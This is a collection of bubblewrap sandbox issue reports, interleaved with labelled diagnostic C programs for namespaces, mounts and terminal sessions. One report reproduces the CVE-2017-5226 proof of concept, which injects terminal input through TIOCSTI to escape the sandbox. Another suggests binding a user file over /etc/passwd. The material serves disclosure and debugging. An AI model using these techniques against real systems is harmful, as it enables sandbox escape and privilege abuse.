containers / bubblewrap
Low-level unprivileged sandboxing tool used by Flatpak and similar projects
License: Other
Version 0.1.6 produces the following error message:
./bwrap --bind / / --proc /proc --dev /dev bash
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
Everything still appears to work.
Tested on Debian (nosuid) and Arch (with and without suid).
In our Endless image builder, we chroot into the ostree deployment to install apps with flatpak. The triggers always fail for 2 reasons:
The slave mounting of / fails because the deployment directory is not actually a mountpoint. This is easily fixed by doing a bind mount beforehand, but I think this can be done in bubblewrap, too. Systemd does this - https://github.com/systemd/systemd/blob/master/src/core/namespace.c#L910.
pivot_root fails with EINVAL for reasons I can't quite grok. See https://github.com/torvalds/linux/blob/master/fs/namespace.c#L3035. FWIW, I can't really see why the pivot_root is needed. It seems that you could just build up the newroot, then move the mount over /. This is also what systemd does. It used to use pivot_root, but changed that in systemd/systemd@ac0930c.
From the manpage
By default, bwrap creates a new user namespace for the sandbox.
But it doesn't!
If --unshare-user is not used, there is no new user namespace if bubblewrap is used with suid permissions.
Running on a system with unprivileged user namespaces available (without suid):
bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --proc /proc --dev /dev bash
ls -l shows:
drwxr-xr-x 4 myuser myuser 300 Jan 7 13:37 dev
drwxr-xr-x 74 nobody nobody 4096 Jan 7 13:09 etc
lrwxrwxrwx 1 myuser myuser 9 Jan 7 13:37 lib64 -> usr/lib64
dr-xr-xr-x 187 nobody nobody 0 Jan 7 12:32 proc
drwxr-xr-x 8 nobody nobody 4096 Dec 10 13:22 usr
Running with suid permissions:
bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --proc /proc --dev /dev bash
ls -l shows:
drwxr-xr-x 4 myuser myuser 300 Jan 7 11:43 dev
drwxr-xr-x 74 root root 4096 Jan 7 11:36 etc
lrwxrwxrwx 1 myuser myuser 9 Jan 7 11:43 lib64 -> usr/lib64
dr-xr-xr-x 187 root root 0 Jan 7 11:11 proc
drwxr-xr-x 8 root root 4096 Dec 10 13:22 usr
This is by default inside a mount namespace, but not inside a user namespace
https://github.com/projectatomic/bubblewrap/blob/master/bubblewrap.c#L1636
Being able to override root-owned files inside a mount namespace but with the real user namespace might create unexpected security issues:
bwrap --ro-bind /usr /usr --symlink usr/lib64 /lib64 --bind /etc /etc --bind /tmp/mypasswd /etc/passwd --proc /proc --dev /dev bash
So now we have an environment inside a mount namespace but in the real user namespace, with a user-specified passwd file.
Since / is mounted nosuid, that does not allow root by simply running 'su' after changing passwd.
But there are files that include permission rules to restrict the user, so exploiting this should be possible.
Some more thoughts:
Are namespaces supposed to be used by normal users outside a (unprivileged) user namespace?
They were probably not designed to be used with suid.
also:
Running 'mkdir /test' will create a user-owned directory in /:
drwx------ 2 myuser myuser 40 Jan 7 11:46 test
Why is / owned by the user and not by root?
Shouldn't the permissions be the same as on the original system?
The same goes for files included with --bind
User namespaces or not, being able to do --bind /tmp/myfile /etc/passwd is scary.
Maybe bound files should have the same permissions as the target directory.
mounting a tmpfs on root owned files seems fine, assuming the permissions don't change (mounting a tmpfs on /etc should result in an empty /etc directory owned by root(or rather "nobody"), not by the user)
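A check for what the report above describes, added here as an example (it is not bubblewrap's code): the program reads the sandboxed process's own /proc/self/uid_map and user-namespace inode, compares the inode with the host's, which the caller passes in through the HOST_USER_NS environment variable (an assumed convention for this example; bwrap passes the environment through by default), and reports who owns /, /etc and /usr. Run it on the host, then under bwrap with and without --unshare-user. In the setuid case without --unshare-user the inode matches the host's and the uid_map is still the initial identity map, which is the situation the ls output above shows.

```c
/* nscheck.c: is this process in a new user namespace, and what does its
 * uid_map say?  Added example for the report above; not bubblewrap code.
 *
 *   cc -o nscheck nscheck.c
 *   ./nscheck
 *   HOST_USER_NS=$(readlink /proc/self/ns/user) bwrap --ro-bind / / --proc /proc ./nscheck
 *   HOST_USER_NS=$(readlink /proc/self/ns/user) bwrap --unshare-user --ro-bind / / --proc /proc ./nscheck
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum uid_map_kind { MAP_EMPTY, MAP_INITIAL, MAP_SINGLE, MAP_OTHER, MAP_INVALID };

/* Classify the text of /proc/self/uid_map.  The initial user namespace shows
 * the identity map "0 0 4294967295"; an unprivileged namespace made by
 * bwrap --unshare-user maps exactly one uid; a namespace whose map was never
 * written is empty (every uid then appears as the overflow uid, "nobody"). */
enum uid_map_kind classify_uid_map(const char *map)
{
    const char *p = map;
    int lines = 0;
    enum uid_map_kind kind = MAP_OTHER;

    while (isspace((unsigned char)*p)) p++;
    if (*p == '\0') return MAP_EMPTY;

    while (*p) {
        unsigned long v[3];            /* inside-uid, outside-uid, count */
        for (int i = 0; i < 3; i++) {
            char *end;
            v[i] = strtoul(p, &end, 10);
            if (end == p) return MAP_INVALID;
            p = end;
        }
        while (isspace((unsigned char)*p)) p++;
        lines++;
        if (lines == 1) {
            if (v[0] == 0 && v[1] == 0 && v[2] == 4294967295UL) kind = MAP_INITIAL;
            else if (v[2] == 1) kind = MAP_SINGLE;
        } else {
            kind = MAP_OTHER;          /* multi-line maps: something set up deliberately */
        }
    }
    return kind;
}

/* "user:[4026531837]" -> 4026531837; 0 if the link text is not of that form. */
unsigned long ns_inode_from_link(const char *link)
{
    const char *lb = strchr(link, '[');
    if (!lb) return 0;
    char *end;
    unsigned long ino = strtoul(lb + 1, &end, 10);
    return (end != lb + 1 && *end == ']') ? ino : 0;
}

/* Inode behind /proc/self/ns/user for the running process, 0 on error. */
unsigned long self_user_ns_inode(void)
{
    char buf[64];
    ssize_t n = readlink("/proc/self/ns/user", buf, sizeof buf - 1);
    if (n < 0) return 0;
    buf[n] = '\0';
    return ns_inode_from_link(buf);
}

int main(void)
{
    static const char *names[] = { "empty (unmapped)", "initial namespace",
                                   "single-uid map", "other", "unparseable" };
    char map[256] = "";
    FILE *f = fopen("/proc/self/uid_map", "r");
    if (!f) { perror("/proc/self/uid_map"); return 1; }
    size_t n = fread(map, 1, sizeof map - 1, f);
    fclose(f);
    map[n] = '\0';
    if (n && map[n - 1] == '\n') map[n - 1] = '\0';
    printf("uid_map: \"%s\" -> %s\n", map, names[classify_uid_map(map)]);

    unsigned long mine = self_user_ns_inode();
    const char *host = getenv("HOST_USER_NS");   /* host's readlink output, if the caller passed it */
    printf("user ns inode: %lu", mine);
    if (host) {
        unsigned long h = ns_inode_from_link(host);
        printf(" (%s the host's %lu)", mine == h ? "same as" : "different from", h);
    }
    printf("\n");

    const char *paths[] = { "/", "/etc", "/usr" };
    struct stat st;
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++)
        if (stat(paths[i], &st) == 0)
            printf("%-4s owned by uid %u%s\n", paths[i], (unsigned)st.st_uid,
                   st.st_uid == getuid() ? " (that is us)" : "");
    return 0;
}
```

Three outcomes are worth telling apart: "initial namespace" with an inode equal to the host's means the sandbox only has a mount namespace, a "single-uid map" with a different inode is the unprivileged --unshare-user case, and an empty map means a user namespace was created but never mapped, which is why files then show up as nobody.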
In some cases, programs vary behavior based on argv[0], but we currently do:
if (execvp (argv[0], argv) == -1)
requiring them to be the same. We should add --argv0 /usr/bin/blah or so.
Right now we have a lot of API surface to create files and such. Are we sure we need an internal tmpfs in order to pivot cleanly? If we assume the host's /tmp is tmpfs, it seems not so bad to just leak that? Maybe....or maybe we change systemd to mount /run/user/$uid/tmpfs as a separate fs by default? (Or use FUSE...)
Actually regarding /tmp, in fact, we should probably use /tmp/containers-XXXXX for /tmp in the container so that the host's systemd-tmpfiles cleans it up properly.
Right now on my desktop system I'm in e.g. the mock group, and that gets propagated into containers that are run.
Dropping groups is an interesting topic (https://lwn.net/Articles/621612/) but honestly I suspect we could just say that if you install this tool, you can't use groups-for-negative-security?
If i do:
bwrap --bind / / --ro-bind /mnt /mnt sh
Then /mnt is readonly, but sub-mounts like /mnt/some-mount are still read-write.
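One way to see this from inside the sandbox, added as an example and not part of bubblewrap: parse /proc/self/mountinfo and flag every mount under a prefix whose per-mount options (field 6, where a read-only bind records ro) lack ro. The sample mount table at the bottom is constructed to mirror the report, with /mnt bound read-only and a submount under it still read-write; run the binary under bwrap with a real prefix to check an actual sandbox.

```c
/* romounts.c: list mounts below a prefix that are not read-only, as seen from
 * inside the sandbox.  Added example for the report above, not bubblewrap code.
 *
 *   cc -o romounts romounts.c
 *   bwrap --bind / / --ro-bind /mnt /mnt ./romounts /mnt
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* True if "ro" is one of the comma-separated per-mount options. */
int opts_has_ro(const char *opts)
{
    for (const char *p = opts; ; ) {
        const char *e = strchr(p, ',');
        size_t n = e ? (size_t)(e - p) : strlen(p);
        if (n == 2 && strncmp(p, "ro", 2) == 0) return 1;
        if (!e) return 0;
        p = e + 1;
    }
}

/* mountinfo line: "id parent maj:min root mountpoint opts [optional...] - fstype src superopts".
 * The per-mount "ro" that a read-only bind sets lives in field 6, not in the
 * superblock options at the end.  Copies the mount point into mnt and sets
 * *ro.  Returns 0, or -1 for a malformed line.  (Mount points containing
 * spaces are octal-escaped by the kernel, e.g. "\040"; not unescaped here.) */
int parse_mountinfo_line(const char *line, char *mnt, size_t mntlen, int *ro)
{
    char id[32], parent[32], dev[32], root[4096], point[4096], opts[512];
    if (sscanf(line, "%31s %31s %31s %4095s %4095s %511s",
               id, parent, dev, root, point, opts) != 6)
        return -1;
    snprintf(mnt, mntlen, "%s", point);
    *ro = opts_has_ro(opts);
    return 0;
}

/* Is mnt equal to prefix or inside it?  "/" contains everything. */
static int under_prefix(const char *mnt, const char *prefix)
{
    size_t n = strlen(prefix);
    if (n == 1 && prefix[0] == '/') return 1;
    return strncmp(mnt, prefix, n) == 0 && (mnt[n] == '\0' || mnt[n] == '/');
}

/* Count (and print when verbose) the mounts under prefix whose options lack "ro". */
int count_rw_under(const char *mountinfo, const char *prefix, int verbose)
{
    int rw = 0;
    const char *p = mountinfo;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[8192];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';

        char mnt[4096];
        int ro;
        if (parse_mountinfo_line(line, mnt, sizeof mnt, &ro) == 0 && under_prefix(mnt, prefix)) {
            if (verbose) printf("%-3s %s\n", ro ? "ro" : "rw", mnt);
            if (!ro) rw++;
        }
        p = nl ? nl + 1 : p + len;
    }
    return rw;
}

/* Constructed sample modelled on the report: /mnt is bound read-only while a
 * submount below it is still read-write. */
const char SAMPLE_MOUNTINFO[] =
    "100 90 0:45 / / rw,relatime - ext4 /dev/sda1 rw\n"
    "101 100 8:17 / /mnt ro,relatime - ext4 /dev/sdb1 rw\n"
    "102 101 8:33 / /mnt/some-mount rw,relatime - ext4 /dev/sdc1 rw\n";

int main(int argc, char **argv)
{
    const char *prefix = argc > 1 ? argv[1] : "/mnt";
    static char buf[1 << 20];                /* 1 MiB is plenty for a sandbox's mount table */
    FILE *f = fopen("/proc/self/mountinfo", "r");
    if (!f) { perror("/proc/self/mountinfo"); return 1; }
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    int rw = count_rw_under(buf, prefix, 1);
    printf("%d read-write mount(s) under %s\n", rw, prefix);
    return rw ? 2 : 0;
}
```

On the constructed table the count for /mnt is 1, the submount, which is exactly the gap the report describes: the ro flag is set on the bind of /mnt only, and the recursively copied mounts beneath it keep their own flags.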
We should have a test suite.
On Debian bug https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850702, Federico Bento writes:
When executing a program via the bubblewrap sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox. This has been assigned CVE-2017-5226.
$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>

int main()
{
    /* push "id\n" into the input queue of the inherited terminal, one byte per ioctl */
    char *cmd = "id\n";
    while (*cmd)
        ioctl(0, TIOCSTI, cmd++);
    /* then run id inside the sandbox; the injected "id" runs in the outer shell afterwards */
    execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o /tmp/test
$ bwrap --ro-bind /lib64 /lib64 --ro-bind /home /home --ro-bind /bin /bin --ro-bind /tmp /tmp --chdir / --unshare-pid --uid 0 /tmp/test
id
uid=0 gid=1000 groups=1000
$ id <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.
The change in #143 breaks the use of bwrap for interactive sessions. For instance, if you run bwrap --bind / / sh, and then press ctrl-Z, the "outer" shell gets unfrozen, but the "inner" shell doesn't get frozen, and both try to read terminal input at the same time.
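The mechanism behind the CVE-2017-5226 report and the trade-off in the #143 change above, with the --argv0 idea from the earlier comment folded in, as an added example that is not bubblewrap's code: tiocsti_inject() is the PoC's loop, probe_tiocsti() runs it from a child with and without setsid() (injecting only a newline, so a successful attempt merely produces an empty prompt), and spawn() runs a program with an explicit argv[0] decoupled from the path, optionally in a new session. The kernel permits TIOCSTI only on the caller's controlling terminal unless it has CAP_SYS_ADMIN, so after setsid() the same call fails with EPERM; the price is that the child leaves the shell's job control, which is the ctrl-Z regression. Later bubblewrap releases make the setsid() step opt-in as --new-session, a fact not stated on this page.

```c
/* tty_escape.c: the TIOCSTI sandbox escape and what setsid() does about it,
 * plus exec with a decoupled argv[0].  Added example; not bubblewrap code.
 *
 *   cc -o tty_escape tty_escape.c && ./tty_escape     (run on a terminal)
 */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <termios.h>
#include <unistd.h>

/* Push s into the input queue of the terminal behind fd, one byte per ioctl,
 * as the PoC does.  Returns 0 or -errno: EPERM when fd is not the caller's
 * controlling terminal, ENOTTY when fd is not a terminal at all, EIO on
 * kernels that disable TIOCSTI (6.2+ with dev.tty.legacy_tiocsti=0). */
int tiocsti_inject(int fd, const char *s)
{
    for (; *s; s++)
        if (ioctl(fd, TIOCSTI, s) < 0)
            return -errno;
    return 0;
}

/* Try the injection from a child, optionally after setsid().  Returns the
 * child's result: 0 if the injection went through, otherwise -errno. */
int probe_tiocsti(int fd, int new_session)
{
    pid_t pid = fork();
    if (pid < 0) return -errno;
    if (pid == 0) {
        if (new_session && setsid() < 0) _exit(errno);
        int r = tiocsti_inject(fd, "\n");   /* a bare newline: harmless if it succeeds */
        _exit(r ? -r : 0);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -errno;
    return WIFEXITED(status) ? -WEXITSTATUS(status) : -EINTR;
}

/* Run path with an explicit argv, so argv[0] need not equal the path (the
 * --argv0 idea), optionally in a new session.  setsid() detaches the child
 * from the controlling terminal, closing the TIOCSTI hole but also taking
 * it out of the shell's job control.  Returns the exit status, 128+signal
 * if the child was killed, or -errno on failure. */
int spawn(const char *path, char *const argv[], int new_session)
{
    pid_t pid = fork();
    if (pid < 0) return -errno;
    if (pid == 0) {
        if (new_session && setsid() < 0) _exit(126);
        execv(path, argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -errno;
    if (WIFEXITED(status)) return WEXITSTATUS(status);
    return WIFSIGNALED(status) ? 128 + WTERMSIG(status) : -EINTR;
}

int main(void)
{
    int same = probe_tiocsti(STDIN_FILENO, 0);
    int detached = probe_tiocsti(STDIN_FILENO, 1);
    printf("TIOCSTI on stdin in the caller's session: %s\n",
           same == 0 ? "allowed, the escape works" : strerror(-same));
    printf("TIOCSTI on stdin after setsid():          %s\n",
           detached == 0 ? "allowed" : strerror(-detached));

    /* argv[0] is "sandboxed-sh" although the binary is /bin/sh; sh reports it as $0 */
    char *const argv[] = { "sandboxed-sh", "-c", "echo \"running as $0\"", NULL };
    return spawn("/bin/sh", argv, 1);
}
```

On a terminal the first probe reports "allowed" and the second "Operation not permitted"; redirect stdin from /dev/null and both report "Inappropriate ioctl for device", which is why a sandbox that hands the child a pipe or a fresh pty instead of the caller's terminal also closes this hole without losing job control in the caller's shell.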
[centos@localhost ~]$ bwrap --unshare-user-try --ro-bind / / /bin/true
Creating new namespace failed, likely because the kernel does not support user namespaces. bwrap must be installed setuid on such systems.
[centos@localhost ~]$ ls -l /usr/bin/bwrap
-rwsr-xr-x. 1 root root 45432 Sep 23 20:00 /usr/bin/bwrap
[centos@localhost ~]$ uname -a
Linux localhost 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[centos@localhost boot]$ egrep "(NAMESPACES|_NS=)" /boot/config-3.10.0-327.36.1.el7.x86_64
CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_USER_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y
CONFIG_NF_CONNTRACK_NETBIOS_NS=m
I may be missing something obvious here.
With the default configuration, installing or uninstalling an application with flatpak throws:
# flatpak install gnome-apps org.gnome.iagno
1 delta parts, 1 loose fetched; 432 KiB transferred in 4 seconds
Creating new namespace failed: Invalid argument
Creating new namespace failed: Invalid argument
Creating new namespace failed: Invalid argument
Installing related: org.gnome.iagno.Locale
1 delta parts, 1 loose fetched; 714 KiB transferred in 5 seconds
Turns out that my ARM setup wants the arguments in another order:
$ grep CLONE /boot/config-4.4.11-ntc
CONFIG_CLONE_BACKWARDS=y
It also seems to be the default upstream kernel configuration:
$ grep CLONE_BACKWARDS arch/arm/Kconfig
select CLONE_BACKWARDS
It's the default for:
CRIS and S390 (already handled) uses BACKWARDS2
Microblaze uses BACKWARDS3
I'm guessing the cases in bubblewrap are incomplete, there's 3 here, plus the "normal" case:
#
# ABI hall of shame
#
config CLONE_BACKWARDS
bool
help
Architecture has tls passed as the 4th argument of clone(2),
not the 5th one.
config CLONE_BACKWARDS2
bool
help
Architecture has the first two arguments of clone(2) swapped.
config CLONE_BACKWARDS3
bool
help
Architecture has tls passed as the 3rd argument of clone(2),
not the 5th one.
Swapping the arguments on ARM as on S390 fixed the warnings, though I'm unsure that's the correct fix, as the first few arguments seem correct. Is there not a way to do this by going through glibc instead?
I saw that if a flatpak app somehow triggers another process to be spawned, when it quits, that spawned process can linger around.
That's bad, because if another app runs later, it may find the initial process and pick it up instead of spawning it again, except that the old process may be pointing to paths or state that don't exist anymore.
Discussing this with @matthiasclasen on IRC, we thought that bubblewrap should provide an option to terminate the sandbox also when the PID 2 dies, to prevent this from happening.
Hi,
I'm trying to install a Flatpak app on a distro which predates Flatpak support.
Error message:
Creating new namespace failed, likely because the kernel does not support user namespaces. bwrap must be installed setuid on such systems.
The kernel has got the following:
CONFIG_NAMESPACES=y
CONFIG_UTS_NS=y
CONFIG_IPC_NS=y
CONFIG_PID_NS=y
CONFIG_NET_NS=y
CONFIG_DEVPTS_MULTIPLE_INSTANCES=y
CONFIG_OVERLAYFS_FS=m
(There may be a spelling error in CONFIG_OVERLAYFS_FS in issue #87.)
-rwsr-xr-x 1 root root 164080 Jan 6 04:55 /usr/local/bin/bwrap*
Version is bubblewrap 0.1.5.
Any suggestions?
Using a Qubes Debian jessie-based AppVM with bubblewrap from jessie-backports (version 0.1.4-2~bpo8+1).
(Neither AppArmor nor grsecurity is being involved.)
Here are instructions on how to reproduce this in Qubes:
QubesOS/qubes-issues#2540
user@host:~/sandbox$ ./sandboxed-tor-browser -debug
2016/12/25 05:35:20 launch: Starting.
2016/12/25 05:35:20 launch: Connecting to the Tor network.
2016/12/25 05:35:20 launch: Starting Tor Browser.
2016/12/25 05:35:20 sandbox: User namespace support detected.
2016/12/25 05:35:20 dynlib: ELF AUXV AT_HWCAP: 0000000000000000
2016/12/25 05:35:20 dynlib: osVersion: 0004041f
2016/12/25 05:35:20 dynlib: debug: Multiple entry: libpng12.so.0: [/lib/x86_64-linux-gnu/libpng12.so.0 /usr/lib/x86_64-linux-gnu/libpng12.so.0]
2016/12/25 05:35:20 dynlib: debug: Multiple entry: libusb-0.1.so.4: [/lib/x86_64-linux-gnu/libusb-0.1.so.4 /usr/lib/x86_64-linux-gnu/libusb-0.1.so.4]
2016/12/25 05:35:20 sandbox: ld.so appears to be '/lib64/ld-linux-x86-64.so.2' -> /lib/x86_64-linux-gnu/ld-2.19.so.
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: Appending extra libs: [libxcb.so.1 libXau.so.6 libXdmcp.so.6 libadwaita.so libprintbackend-file.so libpixbufloader-png.so]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libfreebl3.so imports: [libnssutil3.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/liblgpllibs.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libmozsqlite3.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnspr4.so imports: [libasan.so.2 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnss3.so imports: [libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssckbi.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssdbm3.so imports: [libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssutil3.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplc4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplds4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libsmime3.so imports: [libnss3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libsoftokn3.so imports: [libmozsqlite3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libssl3.so imports: [libnss3.so libnssutil3.so libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libxul.so imports: [libasan.so.2 libpthread.so.0 libdl.so.2 libnss3.so libsmime3.so libssl3.so libnssutil3.so libmozsqlite3.so libplds4.so libplc4.so libnspr4.so liblgpllibs.so libfreetype.so.6 libfontconfig.so.1 librt.so.1 libXrender.so.1 libasound.so.2 libdbus-glib-1.so.2 libdbus-1.so.3 libgobject-2.0.so.0 libglib-2.0.so.0 libgtk-x11-2.0.so.0 libatk-1.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libgdk_pixbuf-2.0.so.0 libpango-1.0.so.0 libcairo.so.2 libX11.so.6 libXext.so.6 libXt.so.6 libgthread-2.0.so.0 libstdc++.so.6 libm.so.6 libgcc_s.so.1 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libdl.so.2 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libasound.so.2 imports: [libm.so.6 libdl.so.2 libpthread.so.0 librt.so.1 libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0 imports: [libpthread.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libfontconfig.so.1 imports: [libfreetype.so.6 libexpat.so.1 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libX11.so.6 imports: [libxcb.so.1 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libgcc_s.so.1 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libxcb.so.1 imports: [libXau.so.6 libXdmcp.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libXdmcp.so.6 imports: [libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpango-1.0.so.0 imports: [libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libm.so.6 libthai.so.0 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/librt.so.1 imports: [libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 imports: [libglib-2.0.so.0 libffi.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libpangoft2-1.0.so.0 imports: [libpango-1.0.so.0 libgobject-2.0.so.0 libgmodule-2.0.so.0 libgthread-2.0.so.0 libglib-2.0.so.0 libharfbuzz.so.0 libfontconfig.so.1 libfreetype.so.6 libm.so.6 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libnssutil3.so imports: [libplc4.so libplds4.so libnspr4.so libpthread.so.0 libdl.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libdbus-glib-1.so.2 imports: [libdbus-1.so.3 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libglib-2.0.so.0 imports: [libpcre.so.3 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libcairo.so.2 imports: [libpthread.so.0 libpixman-1.so.0 libfontconfig.so.1 libfreetype.so.6 libpng12.so.0 libxcb-shm.so.0 libxcb-render.so.0 libxcb.so.1 libXrender.so.1 libX11.so.6 libXext.so.6 libz.so.1 librt.so.1 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /lib/x86_64-linux-gnu/libpthread.so.0 imports: [libc.so.6 ld-linux-x86-64.so.2]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/TorBrowser/Tor/libstdc++.so.6 imports: [libm.so.6 libc.so.6 ld-linux-x86-64.so.2 libgcc_s.so.1]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/gtk-2.0/2.10.0/engines/libadwaita.so imports: [libgtk-x11-2.0.so.0 libatk-1.0.so.0 libgio-2.0.so.0 libpangoft2-1.0.so.0 libfontconfig.so.1 libfreetype.so.6 libgdk-x11-2.0.so.0 libpangocairo-1.0.so.0 libpango-1.0.so.0 libcairo.so.2 libgdk_pixbuf-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpthread.so.0 libc.so.6]
2016/12/25 05:35:20 dynlib: /home/user/.local/share/sandboxed-tor-browser/tor-browser/Browser/libplc4.so imports: [libasan.so.2 libdl.so.2 libnspr4.so libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 imports: [libgobject-2.0.so.0 libgmodule-2.0.so.0 libglib-2.0.so.0 libz.so.1 libselinux.so.1 libresolv.so.2 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgdk-x11-2.0.so.0 imports: [libpangocairo-1.0.so.0 libpango-1.0.so.0 libgdk_pixbuf-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libfontconfig.so.1 libfreetype.so.6 libXrender.so.1 libXinerama.so.1 libXi.so.6 libXrandr.so.2 libXcursor.so.1 libXcomposite.so.1 libXdamage.so.1 libXfixes.so.3 libcairo.so.2 libX11.so.6 libXext.so.6 libm.so.6 libc.so.6]
2016/12/25 05:35:20 dynlib: /usr/lib/x86_64-linux-gnu/libgdk_pixbuf-2.0.so.0 imports: [libgmodule-2.0.so.0 libgio-2.0.so.0 libgobject-2.0.so.0 libglib-2.0.so.0 libpng12.so.0 libm.so.6 libpthread.so.0 libc.so.6]
